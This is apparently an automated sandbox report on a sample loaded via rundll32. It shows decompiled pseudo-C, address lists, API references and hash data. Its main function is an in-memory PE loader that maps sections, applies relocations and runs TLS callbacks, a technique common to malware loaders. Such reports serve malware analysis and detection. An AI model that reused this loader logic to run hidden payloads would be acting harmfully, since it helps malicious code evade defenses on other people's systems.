						asm("lock xadd [eax], ebx");
						__eflags = _t64 == 1;
						if(_t64 == 1) {
							_t58 = _a12;
							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x6f366268;
							if( *((intOrPtr*)(_t58 + 0x48)) != 0x6f366268) {
								E6F33FEFF( *((intOrPtr*)(_t58 + 0x48)));
							}
						}
						 *_t81 = 1;
						_t76 = _t81;
						_t81 = 0;
						 *(_a12 + 0x48) = _t76;
						_t48 = _a12;
						__eflags =  *(_t48 + 0x350) & 0x00000002;
						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x6f366788 & 0x00000001;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t51 = 5;
								_v16 = _t51;
								_v12 = _t51;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6F341EC2( &_v5, _t79, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6f36625c =  *_a16;
								}
							}
						}
						L6:
						E6F33FEFF(_t81);
						return _t86;
					} else {
						 *((intOrPtr*)(E6F3401A4(__eflags))) = 0x16;
						goto L5;
					}
				}
			}

0x6f342221
0x6f342229
0x6f34222c
0x6f34222f
0x6f342237
0x6f342242
0x6f342245
0x6f34224b
0x00000000
0x6f34224d
0x6f342251
0x6f34225e
0x6f342260
0x6f342264
0x6f342266
0x6f342296
0x6f342296
0x00000000
0x6f342268
0x6f342275
0x6f34227b
0x6f342283
0x6f342287
0x6f342289
0x6f3422a8
0x6f3422ac
0x6f3422ae
0x6f3422ae
0x6f3422b9
0x6f3422bd
0x6f3422be
0x6f3422c0
0x6f3422c3
0x6f3422ca
0x6f3422cf
0x6f3422d4
0x6f3422ca
0x6f3422d5
0x6f3422db
0x6f3422e0
0x6f3422e2
0x6f3422e5
0x6f3422e8
0x6f3422ef
0x6f3422f1
0x6f3422f8
0x6f3422fd
0x6f342308
0x6f34230b
0x6f34230c
0x6f34230f
0x6f342315
0x6f342319
0x6f34231d
0x6f34231e
0x6f342323
0x6f342327
0x6f342332
0x6f342332
0x6f342327
0x6f3422f8
0x6f342298
0x6f342299
0x00000000
0x6f34228b
0x6f342290
0x00000000
0x6f342290
0x6f342289

APIs

Part of subcall function 6F341FC6: GetOEMCP.KERNEL32(00000000,6F34223C,6F343187,00000000,00000000,00000000,00000000,?,6F343187), ref: 6F341FF1

_free.LIBCMT ref: 6F342299
_free.LIBCMT ref: 6F3422CF

Strings

hb6o, xrefs: 6F3422C3

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: hb6o
API String ID: 269201875-3230986754
Opcode ID: 0f9c6eafdcd3e7a1e273ba950dc536bd6f154f5c89799836ba7f0befab9347e1
Instruction ID: 505596b1444f28d9af85a5429b75208a6e39a29cbd02827092ed06cf30faf5d2
Opcode Fuzzy Hash: 0f9c6eafdcd3e7a1e273ba950dc536bd6f154f5c89799836ba7f0befab9347e1
Instruction Fuzzy Hash: 06319E72904249AFDB01DF69C940BDA7BF4EF85324F15416AE814EB291EB32ED50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6F33CD1E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6F33CD1E(void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t48;
				signed int _t54;

				if( *0x6f37e131 == 0) {
					_t54 = _a4;
					__eflags = _t54;
					if(_t54 == 0) {
						L4:
						_t19 = E6F33D216();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6f36609c; // 0xe80c9ffe
							_push(_t48);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6f36609c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t54;
							if(_t54 != 0) {
								goto L9;
							} else {
								_t25 = E6F33FB81(_t19, 0x6f37e134);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6F33FB81(_t25, 0x6f37e140);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6f37e131 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t54 - 1;
						if(_t54 != 1) {
							E6F33CEA2(__edx, _t48, _t54, 5);
							asm("int3");
							E6F33D020(__edx, 0x6f364f98, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6f320000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6f32003c; // 0x80
								__eflags =  *((intOrPtr*)(_t31 + 0x6f320000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6f320000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6f320018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6f320018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6F33CBA6(0x6f320000, _a4 - 0x6f320000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6f33cd2b
0x6f33cd32
0x6f33cd35
0x6f33cd37
0x6f33cd3e
0x6f33cd3e
0x6f33cd43
0x6f33cd45
0x6f33cd6d
0x6f33cd6d
0x6f33cd75
0x6f33cd7e
0x6f33cd86
0x6f33cd88
0x6f33cd88
0x6f33cd8e
0x6f33cd91
0x6f33cd94
0x6f33cd97
0x6f33cd98
0x6f33cd99
0x6f33cd9f
0x6f33cda2
0x6f33cda8
0x6f33cdab
0x6f33cdac
0x6f33cdad
0x00000000
0x6f33cd47
0x6f33cd47
0x6f33cd49
0x00000000
0x6f33cd4b
0x6f33cd50
0x6f33cd56
0x6f33cd58
0x6f33cd69
0x6f33cd69
0x6f33cd5a
0x6f33cd5f
0x6f33cd65
0x6f33cd67
0x6f33cdaf
0x6f33cdaf
0x6f33cdb6
0x00000000
0x00000000
0x00000000
0x6f33cd67
0x6f33cd58
0x6f33cd49
0x6f33cdba
0x6f33cd39
0x6f33cd39
0x6f33cd3c
0x6f33cdbd
0x6f33cdc2
0x6f33cdca
0x6f33cdcf
0x6f33cdd8
0x6f33cddf
0x6f33ce3e
0x6f33ce3e
0x6f33ce45
0x6f33ce45
0x6f33cde1
0x6f33cde1
0x6f33cde6
0x6f33cdf0
0x00000000
0x6f33cdf2
0x6f33cdf7
0x6f33cdfe
0x00000000
0x6f33ce00
0x6f33ce0c
0x6f33ce13
0x6f33ce15
0x00000000
0x6f33ce17
0x6f33ce17
0x6f33ce1b
0x00000000
0x6f33ce1d
0x6f33ce1d
0x6f33ce24
0x6f33ce24
0x6f33ce1b
0x6f33ce15
0x6f33cdfe
0x6f33cdf0
0x6f33ce4a
0x6f33ce56
0x00000000
0x00000000
0x00000000
0x6f33cd3c
0x6f33cd2d
0x6f33cd30
0x6f33cd30

Strings

47o, xrefs: 6F33CD79
@7o, xrefs: 6F33CD9A

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 47o$@7o
API String ID: 0-1575379197
Opcode ID: 2889655ee6265e795fc1257062be945ce8a6cbaf3139ce0e0cd7af22acd81cf7
Instruction ID: 73f126f9cdba30c98fa27cca780c0d13e9213c20b07dd1593c1e7ae8233b1762
Opcode Fuzzy Hash: 2889655ee6265e795fc1257062be945ce8a6cbaf3139ce0e0cd7af22acd81cf7
Instruction Fuzzy Hash: C0117077E017B56ACF15DE78C8416CE7BE99F06368F01416AEC50EB280D672A54187A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4624 Parent PID: 4828 rundll32.exeCOMMON

Executed Functions

Function 6F33BB30, Relevance: 14.0, APIs: 9, Instructions: 493
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6F33BB30(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				long _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				long _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				signed int _t198;
				void* _t209;
				long _t212;
				intOrPtr _t221;
				void* _t231;
				void _t235;
				void* _t237;
				signed int _t239;
				long _t240;
				signed int _t242;
				void* _t244;
				intOrPtr _t245;
				long _t248;
				intOrPtr* _t253;
				signed int* _t255;
				signed int* _t258;
				void* _t263;
				signed int _t264;
				signed int _t265;
				signed char _t266;
				intOrPtr _t267;
				signed int _t270;
				void* _t279;
				void* _t288;
				void* _t293;
				intOrPtr _t294;
				signed int _t297;
				void _t298;
				intOrPtr _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				long _t306;
				signed char _t307;
				signed int _t308;
				intOrPtr _t312;
				void _t314;
				signed int _t318;
				signed int _t319;
				void _t321;
				intOrPtr _t329;
				intOrPtr _t333;
				void* _t336;
				signed int* _t339;
				void* _t341;
				signed int _t343;
				intOrPtr _t345;
				intOrPtr _t346;
				void _t348;
				signed int _t353;
				signed short* _t354;
				void* _t355;
				signed int _t358;
				long _t361;
				void* _t362;
				intOrPtr _t367;
				intOrPtr _t368;
				long _t369;
				long _t371;
				signed int _t375;
				void* _t376;
				long _t379;
				intOrPtr _t380;
				intOrPtr* _t384;
				signed int _t388;
				void* _t390;
				intOrPtr _t392;
				long _t394;
				intOrPtr _t395;
				signed int _t396;
				void* _t397;
				void* _t398;

				_t198 =  *0x6f36609c; // 0xe6b94de
				_v8 = _t198 ^ _t396;
				_t339 = __ecx;
				_push(__esi);
				_t371 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				_push(__edi);
				if(__edx < 0x40) {
					L3:
					_push(0xd);
					goto L88;
				} else {
					if( *__ecx != 0x5a4d) {
						L87:
						_push(0xc1);
						goto L88;
					} else {
						_t4 = _t339 + 0x3c; // 0xcccccccc
						_t306 =  *_t4;
						_v72 = _t306;
						_t6 = _t306 + 0xf8; // 0xcccccdc4
						if(__edx >= _t6) {
							_t297 = _t306 + __ecx;
							_v68 = _t297;
							if( *(_t306 + __ecx) != 0x4550 ||  *((intOrPtr*)(_t297 + 4)) != 0x14c) {
								goto L87;
							} else {
								_t307 =  *(_t297 + 0x38);
								if((_t307 & 0x00000001) != 0) {
									goto L87;
								} else {
									_t358 =  *(_t297 + 6) & 0x0000ffff;
									_t341 = ( *(_t297 + 0x14) & 0x0000ffff) + 0x24;
									if(_t358 != 0) {
										_t355 = _t341 + _t297;
										do {
											_t294 =  *((intOrPtr*)(_t355 + 4));
											_t355 = _t355 + 0x28;
											_t335 =  !=  ? _t294 : _t307;
											_t336 = ( !=  ? _t294 : _t307) +  *((intOrPtr*)(_t355 - 0x28));
											_t337 =  <=  ? _t371 : _t336;
											_t371 =  <=  ? _t371 : _t336;
											_t307 =  *(_t297 + 0x38);
											_t358 = _t358 - 1;
										} while (_t358 != 0);
									}
									__imp__GetNativeSystemInfo( &_v44); // executed
									_t308 = _v40;
									_t343 =  !(_t308 - 1);
									_t361 = _t308 - 0x00000001 +  *((intOrPtr*)(_t297 + 0x50)) & _t343;
									if(_t361 != (_t308 - 0x00000001 + _t371 & _t343)) {
										goto L87;
									} else {
										_t209 = VirtualAlloc( *(_t297 + 0x34), _t361, 0x3000, 4); // executed
										_v60 = _t209;
										if(_t209 != 0) {
											L13:
											_v100 = GetProcessHeap;
											_t212 = HeapAlloc(GetProcessHeap(), 8, 0x44);
											_t362 = _t212;
											_v76 = _t362;
											if(_t362 != 0) {
												 *((intOrPtr*)(_t362 + 4)) = _v60;
												 *((intOrPtr*)(_t362 + 0x1c)) = E6F33BA90;
												 *(_t362 + 0x14) = ( *(_t297 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
												 *((intOrPtr*)(_t362 + 0x20)) = E6F33BAB0;
												 *((intOrPtr*)(_t362 + 0x24)) = E6F33BAD0;
												 *((intOrPtr*)(_t362 + 0x28)) = E6F33BAE0;
												 *((intOrPtr*)(_t362 + 0x2c)) = E6F33BB00;
												 *(_t362 + 0x34) = 0;
												 *(_t362 + 0x40) = _v40;
												if(E6F33B840(_v56,  *(_t297 + 0x54)) == 0) {
													L33:
													E6F33E93F( *((intOrPtr*)(_t362 + 0x30)));
													_t220 =  *((intOrPtr*)(_t362 + 8));
													_t398 = _t397 + 4;
													if( *((intOrPtr*)(_t362 + 8)) != 0) {
														_t375 = 0;
														if( *((intOrPtr*)(_t362 + 0xc)) > 0) {
															do {
																_t220 =  *((intOrPtr*)(_t362 + 8));
																_t312 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 8)) + _t375 * 4));
																if(_t312 != 0) {
																	 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x2c))))(_t312,  *(_t362 + 0x34));
																	_t220 =  *((intOrPtr*)(_t362 + 8));
																	_t398 = _t398 + 8;
																}
																_t375 = _t375 + 1;
															} while (_t375 <  *((intOrPtr*)(_t362 + 0xc)));
														}
														E6F33E93F(_t220);
														_t398 = _t398 + 4;
													}
													_t221 =  *((intOrPtr*)(_t362 + 4));
													if(_t221 != 0) {
														 *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x20))))(_t221, 0, 0x8000,  *(_t362 + 0x34));
													}
													HeapFree(_v100(), 0, _t362);
													return E6F33C65E(_v8 ^ _t396);
												} else {
													_t231 = VirtualAlloc(_v60,  *(_t297 + 0x54), 0x1000, 4); // executed
													_t376 = _t231;
													E6F33DD40(_t376, _v48,  *(_t297 + 0x54));
													_t397 = _t397 + 0xc;
													_v64 = 0;
													_t235 = _t376 + _v48[0xf];
													 *_t362 = _t235;
													 *((intOrPtr*)(_t235 + 0x34)) = _v60;
													_t314 =  *_t362;
													_t345 =  *((intOrPtr*)(_t362 + 4));
													_v52 = _t345;
													_t237 = ( *(_t314 + 0x14) & 0x0000ffff) + 0x24;
													if(0 >=  *(_t314 + 6)) {
														L29:
														_t239 =  *((intOrPtr*)(_t314 + 0x34)) -  *(_t297 + 0x34);
														_v68 = _t239;
														if(_t239 == 0) {
															L51:
															_t240 = 1;
														} else {
															if( *((intOrPtr*)(_t314 + 0xa4)) != 0) {
																_t353 =  *((intOrPtr*)(_t362 + 4));
																_t301 =  *((intOrPtr*)(_t314 + 0xa0)) + _t353;
																_v56 = _t353;
																_t267 =  *_t301;
																if(_t267 != 0) {
																	do {
																		_t329 =  *((intOrPtr*)(_t301 + 4));
																		_v72 = _t267 + _t353;
																		_t354 = _t301 + 8;
																		_t390 = 0;
																		if((_t329 - 0x00000008 & 0xfffffffe) > 0) {
																			_t369 = _v72;
																			do {
																				_t270 =  *_t354 & 0x0000ffff;
																				if((_t270 & 0x0000f000) == 0x3000) {
																					 *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) =  *((intOrPtr*)((_t270 & 0x00000fff) + _t369)) + _v68;
																				}
																				_t329 =  *((intOrPtr*)(_t301 + 4));
																				_t390 = _t390 + 1;
																				_t354 =  &(_t354[1]);
																			} while (_t390 < _t329 - 8 >> 1);
																		}
																		_t267 =  *((intOrPtr*)(_t301 + _t329));
																		_t301 = _t301 + _t329;
																		_t353 = _v56;
																	} while (_t267 != 0);
																	_t362 = _v76;
																}
																goto L51;
															} else {
																_t240 = 0;
															}
														}
														 *(_t362 + 0x18) = _t240;
														if(E6F33B920(_t362) == 0) {
															goto L33;
														} else {
															_t298 =  *_t362;
															_t379 = ( *(_t298 + 0x14) & 0x0000ffff) + _t298;
															_t242 =  *(_t379 + 0x20);
															_t318 =  ~( *(_t362 + 0x40)) & _t242;
															_t346 =  *((intOrPtr*)(_t379 + 0x28));
															_v64 = _t242;
															_v96 = _t242;
															_v68 = _t318;
															_v92 = _t318;
															if(_t346 == 0) {
																_t266 =  *(_t379 + 0x3c);
																if((_t266 & 0x00000040) == 0) {
																	if(_t266 < 0) {
																		_t346 =  *((intOrPtr*)(_t298 + 0x24));
																	}
																} else {
																	_t346 =  *((intOrPtr*)(_t298 + 0x20));
																}
															}
															_t319 =  *(_t379 + 0x3c);
															_v88 = _t346;
															_v84 = _t319;
															_v80 = 0;
															_v72 = 1;
															if(1 >=  *(_t298 + 6)) {
																L75:
																_v80 = 1;
																_t244 = E6F33B860(_t298, _t362,  &_v96, _t362, _t379); // executed
																if(_t244 == 0) {
																	goto L33;
																} else {
																	_t348 =  *_t362;
																	_t321 = _t348;
																	_t380 =  *((intOrPtr*)(_t348 + 0xc0));
																	if(_t380 != 0) {
																		_t299 =  *((intOrPtr*)(_t362 + 4));
																		_t384 =  *((intOrPtr*)(_t380 + _t299 + 0xc));
																		if(_t384 != 0) {
																			_t253 =  *_t384;
																			if(_t253 != 0) {
																				do {
																					 *_t253(_t299, 1, 0);
																					_t253 =  *((intOrPtr*)(_t384 + 4));
																					_t384 = _t384 + 4;
																				} while (_t253 != 0);
																				_t321 =  *_t362;
																			}
																		}
																	}
																	_t245 =  *((intOrPtr*)(_t321 + 0x28));
																	if(_t245 == 0) {
																		 *(_t362 + 0x38) = 0;
																		return E6F33C65E(_v8 ^ _t396);
																	} else {
																		_t248 = _t245 + _v60;
																		if( *(_t362 + 0x14) == 0) {
																			 *(_t362 + 0x38) = _t248;
																			return E6F33C65E(_v8 ^ _t396);
																		} else {
																			 *(_t362 + 0x3c) = _t248;
																			 *(_t362 + 0x10) = 1;
																			return E6F33C65E(_v8 ^ _t396);
																		}
																	}
																}
															} else {
																_t255 = _t379 + 0x64;
																_v48 = _t255;
																do {
																	_v56 =  *((intOrPtr*)(_t255 - 0x1c));
																	_t367 =  *((intOrPtr*)(_t255 - 0x14));
																	_t388 =  ~( *(_t362 + 0x40)) & _v56;
																	_v52 = _t367;
																	_t362 = _v76;
																	if(_t367 == 0) {
																		if(( *_t255 & 0x00000040) == 0) {
																			if(( *_t255 & 0x00000080) != 0) {
																				_t368 =  *((intOrPtr*)(_t298 + 0x24));
																				goto L65;
																			}
																		} else {
																			_t368 =  *((intOrPtr*)(_t298 + 0x20));
																			L65:
																			_v52 = _t368;
																			_t362 = _v76;
																		}
																	}
																	if(_v68 == _t388) {
																		L71:
																		_t319 = _t319 |  *_t255;
																		asm("bt eax, 0x19");
																		if(_t319 >= 0) {
																			_t319 = _t319 & 0xfdffffff;
																		}
																		_t346 = _v52 - _v64 + _v56;
																		_t258 = _v48;
																		goto L74;
																	} else {
																		if(_v64 + _t346 > _t388) {
																			_t255 = _v48;
																			goto L71;
																		} else {
																			_t263 = E6F33B860(_t298, _t362,  &_v96, _t362, _t388); // executed
																			if(_t263 == 0) {
																				goto L33;
																			} else {
																				_t264 = _v56;
																				_t346 = _v52;
																				_t298 =  *_t362;
																				_v64 = _t264;
																				_v96 = _t264;
																				_t265 = _t388;
																				_v68 = _t265;
																				_v92 = _t265;
																				_t258 = _v48;
																				_t319 =  *_t258;
																				goto L74;
																			}
																		}
																	}
																	goto L89;
																	L74:
																	_v48 =  &(_t258[0xa]);
																	_t379 = _v72 + 1;
																	_v84 = _t319;
																	_t255 = _v48;
																	_v88 = _t346;
																	_v72 = _t379;
																} while (_t379 < ( *(_t298 + 6) & 0x0000ffff));
																goto L75;
															}
														}
													} else {
														_t302 = _t237 + _t314;
														do {
															_t333 =  *((intOrPtr*)(_t302 + 4));
															if(_t333 != 0) {
																if(_v56 <  *((intOrPtr*)(_t302 + 8)) + _t333) {
																	SetLastError(0xd);
																	goto L33;
																} else {
																	_t279 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t333, 0x1000, 4,  *(_t362 + 0x34)); // executed
																	_t397 = _t397 + 0x14;
																	if(_t279 == 0) {
																		goto L33;
																	} else {
																		_t392 =  *_t302 + _v52;
																		E6F33DD40(_t392,  *((intOrPtr*)(_t302 + 8)) + _v48,  *((intOrPtr*)(_t302 + 4)));
																		 *((intOrPtr*)(_t302 - 4)) = _t392;
																		goto L26;
																	}
																}
															} else {
																_t395 =  *((intOrPtr*)( &(_v48[0xe]) + _v72));
																if(_t395 <= 0) {
																	goto L27;
																} else {
																	_t288 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c))))( *_t302 + _t345, _t395, 0x1000, 4,  *(_t362 + 0x34));
																	_t397 = _t397 + 0x14;
																	if(_t288 == 0) {
																		goto L33;
																	} else {
																		 *((intOrPtr*)(_t302 - 4)) =  *_t302 + _v52;
																		E6F33D230(_t362,  *_t302 + _v52, 0, _t395);
																		L26:
																		_t345 = _v52;
																		_t397 = _t397 + 0xc;
																		goto L27;
																	}
																}
															}
															goto L89;
															L27:
															_t314 =  *_t362;
															_t302 = _t302 + 0x28;
															_t394 = _v64 + 1;
															_v64 = _t394;
														} while (_t394 < ( *(_t314 + 6) & 0x0000ffff));
														_t297 = _v68;
														goto L29;
													}
												}
											} else {
												VirtualFree(_v60, _t212, 0x8000);
												goto L15;
											}
										} else {
											_t293 = VirtualAlloc(_t209, _t361, 0x3000, 4);
											_v60 = _t293;
											if(_t293 == 0) {
												L15:
												_push(0xe);
												L88:
												SetLastError();
												return E6F33C65E(_v8 ^ _t396);
											} else {
												goto L13;
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				L89:
			}

0x6f33bb36
0x6f33bb3d
0x6f33bb43
0x6f33bb45
0x6f33bb46
0x6f33bb48
0x6f33bb4b
0x6f33bb4e
0x6f33bb52
0x6f33bb72
0x6f33bb72
0x00000000
0x6f33bb54
0x6f33bb5c
0x6f33c0b0
0x6f33c0b0
0x00000000
0x6f33bb62
0x6f33bb62
0x6f33bb62
0x6f33bb65
0x6f33bb68
0x6f33bb70
0x6f33bb80
0x6f33bb83
0x6f33bb86
0x00000000
0x6f33bb9b
0x6f33bb9b
0x6f33bba1
0x00000000
0x6f33bba7
0x6f33bbab
0x6f33bbaf
0x6f33bbb4
0x6f33bbb6
0x6f33bbb8
0x6f33bbb8
0x6f33bbbb
0x6f33bbc0
0x6f33bbc3
0x6f33bbc8
0x6f33bbcb
0x6f33bbcd
0x6f33bbd0
0x6f33bbd0
0x6f33bbb8
0x6f33bbd9
0x6f33bbdf
0x6f33bbe8
0x6f33bbf2
0x6f33bbf8
0x00000000
0x6f33bbfe
0x6f33bc0f
0x6f33bc11
0x6f33bc16
0x6f33bc2a
0x6f33bc33
0x6f33bc39
0x6f33bc3f
0x6f33bc41
0x6f33bc46
0x6f33bc64
0x6f33bc71
0x6f33bc78
0x6f33bc7b
0x6f33bc82
0x6f33bc89
0x6f33bc90
0x6f33bc97
0x6f33bca1
0x6f33bcae
0x6f33bde2
0x6f33bde5
0x6f33bdea
0x6f33bded
0x6f33bdf2
0x6f33bdf4
0x6f33bdf9
0x6f33be00
0x6f33be00
0x6f33be03
0x6f33be08
0x6f33be11
0x6f33be13
0x6f33be16
0x6f33be16
0x6f33be19
0x6f33be1a
0x6f33be00
0x6f33be20
0x6f33be25
0x6f33be25
0x6f33be28
0x6f33be2d
0x6f33be3d
0x6f33be3f
0x6f33be49
0x6f33be61
0x6f33bcb4
0x6f33bcc1
0x6f33bcc6
0x6f33bccc
0x6f33bcd4
0x6f33bcda
0x6f33bce4
0x6f33bce8
0x6f33bcea
0x6f33bced
0x6f33bcef
0x6f33bcf2
0x6f33bcf9
0x6f33bd00
0x6f33bdb7
0x6f33bdba
0x6f33bdbd
0x6f33bdc0
0x6f33becd
0x6f33becd
0x6f33bdc6
0x6f33bdcd
0x6f33be62
0x6f33be6b
0x6f33be6d
0x6f33be70
0x6f33be74
0x6f33be76
0x6f33be76
0x6f33be7b
0x6f33be7e
0x6f33be81
0x6f33be8b
0x6f33be8d
0x6f33be90
0x6f33be90
0x6f33bea1
0x6f33beab
0x6f33beab
0x6f33beae
0x6f33beb1
0x6f33beb2
0x6f33beba
0x6f33be90
0x6f33bebe
0x6f33bec1
0x6f33bec3
0x6f33bec6
0x6f33beca
0x6f33beca
0x00000000
0x6f33bdd3
0x6f33bdd3
0x6f33bdd3
0x6f33bdcd
0x6f33bed4
0x6f33bede
0x00000000
0x6f33bee4
0x6f33bee4
0x6f33beef
0x6f33bef1
0x6f33bef4
0x6f33bef6
0x6f33bef9
0x6f33befc
0x6f33beff
0x6f33bf02
0x6f33bf07
0x6f33bf09
0x6f33bf0e
0x6f33bf17
0x6f33bf19
0x6f33bf19
0x6f33bf10
0x6f33bf10
0x6f33bf10
0x6f33bf0e
0x6f33bf1c
0x6f33bf24
0x6f33bf27
0x6f33bf2a
0x6f33bf31
0x6f33bf3c
0x6f33c005
0x6f33c008
0x6f33c011
0x6f33c018
0x00000000
0x6f33c01e
0x6f33c01e
0x6f33c020
0x6f33c022
0x6f33c02a
0x6f33c02c
0x6f33c02f
0x6f33c035
0x6f33c037
0x6f33c03b
0x6f33c040
0x6f33c045
0x6f33c047
0x6f33c04a
0x6f33c04d
0x6f33c051
0x6f33c051
0x6f33c03b
0x6f33c035
0x6f33c053
0x6f33c058
0x6f33c096
0x6f33c0af
0x6f33c05a
0x6f33c05a
0x6f33c061
0x6f33c080
0x6f33c095
0x6f33c063
0x6f33c063
0x6f33c068
0x6f33c07f
0x6f33c07f
0x6f33c061
0x6f33c058
0x6f33bf42
0x6f33bf42
0x6f33bf45
0x6f33bf50
0x6f33bf53
0x6f33bf59
0x6f33bf5e
0x6f33bf63
0x6f33bf66
0x6f33bf69
0x6f33bf6e
0x6f33bf78
0x6f33bf7a
0x00000000
0x6f33bf7a
0x6f33bf70
0x6f33bf70
0x6f33bf7d
0x6f33bf7d
0x6f33bf80
0x6f33bf80
0x6f33bf6e
0x6f33bf86
0x6f33bfc3
0x6f33bfc9
0x6f33bfcb
0x6f33bfcf
0x6f33bfd1
0x6f33bfd1
0x6f33bfdd
0x6f33bfe0
0x00000000
0x6f33bf88
0x6f33bf8f
0x6f33bfc0
0x00000000
0x6f33bf91
0x6f33bf96
0x6f33bf9d
0x00000000
0x6f33bfa3
0x6f33bfa3
0x6f33bfa6
0x6f33bfa9
0x6f33bfab
0x6f33bfae
0x6f33bfb1
0x6f33bfb3
0x6f33bfb6
0x6f33bfb9
0x6f33bfbc
0x00000000
0x6f33bfbc
0x6f33bf9d
0x6f33bf8f
0x00000000
0x6f33bfe3
0x6f33bfe9
0x6f33bfec
0x6f33bff3
0x6f33bff6
0x6f33bff9
0x6f33bffc
0x6f33bffc
0x00000000
0x6f33bf50
0x6f33bf3c
0x6f33bd06
0x6f33bd06
0x6f33bd10
0x6f33bd10
0x6f33bd15
0x6f33bd60
0x6f33bddc
0x00000000
0x6f33bd62
0x6f33bd75
0x6f33bd77
0x6f33bd7c
0x00000000
0x6f33bd7e
0x6f33bd89
0x6f33bd8e
0x6f33bd93
0x00000000
0x6f33bd93
0x6f33bd7c
0x6f33bd17
0x6f33bd1d
0x6f33bd23
0x00000000
0x6f33bd25
0x6f33bd38
0x6f33bd3a
0x6f33bd3f
0x00000000
0x6f33bd45
0x6f33bd4e
0x6f33bd51
0x6f33bd96
0x6f33bd96
0x6f33bd99
0x00000000
0x6f33bd99
0x6f33bd3f
0x6f33bd23
0x00000000
0x6f33bd9c
0x6f33bd9c
0x6f33bd9e
0x6f33bda4
0x6f33bda5
0x6f33bdac
0x6f33bdb4
0x00000000
0x6f33bdb4
0x6f33bd00
0x6f33bc48
0x6f33bc51
0x00000000
0x6f33bc51
0x6f33bc18
0x6f33bc21
0x6f33bc23
0x6f33bc28
0x6f33bc57
0x6f33bc57
0x6f33c0b5
0x6f33c0b5
0x6f33c0cd
0x00000000
0x00000000
0x00000000
0x6f33bc28
0x6f33bc16
0x6f33bbf8
0x6f33bba1
0x00000000
0x00000000
